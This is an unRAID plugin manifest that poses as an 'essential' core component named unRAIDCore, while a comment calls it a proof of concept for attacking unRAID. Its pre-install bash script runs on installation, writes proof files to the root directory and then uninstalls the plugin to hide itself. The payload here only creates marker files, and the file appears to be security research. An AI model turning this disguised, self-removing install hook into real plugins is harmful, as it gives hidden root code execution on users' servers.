<?xml version='1.0' standalone='yes'?>

<!DOCTYPE PLUGIN [
<!ENTITY name      "unRAIDCore">
<!ENTITY author    "squib">
<!ENTITY version   "2024.10.10">
<!ENTITY pluginURL "https://raw.githubusercontent.com/justin-himself/test/refs/heads/main/unRAIDCore.plg">
]>

<PLUGIN name="&name;"
        author="&author;"
        version="&version;"
        pluginURL="&pluginURL;">

<CHANGES>
##&name;
####2024-10-10
- first release
</CHANGES>

<!--
- This plugin provides essential functionality for unRAID and should not be removed.
- POC for attacking unRAID :]
-->

<!-- The 'pre-install' script. -->
<FILE Run="/bin/bash">
<INLINE>
# Create a proof file
touch "/proof-$(date -Ins)"
# Delete the plugin
plugin remove unRAIDCore.plg &> /remove-plugin-output.txt
# Create a proof file
touch "/proof2-$(date -Ins)"
</INLINE>
</FILE>

</PLUGIN>
